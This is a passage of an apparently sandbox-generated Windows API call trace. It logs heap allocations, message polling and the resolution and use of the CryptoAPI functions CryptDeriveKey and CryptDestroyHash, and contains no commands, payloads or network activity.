lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0179.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd978, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0179.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.212] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0179.212] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0179.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.216] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0179.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0179.217] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0179.217] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.217] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0179.217] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0179.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.218] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0179.219] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4a0 [0179.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0179.221] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0179.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0179.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0179.221] CryptDestroyHash (hHash=0x90af58) returned 1 [0179.221] RtlAllocateHeap (HeapHandle=0x8a0000, 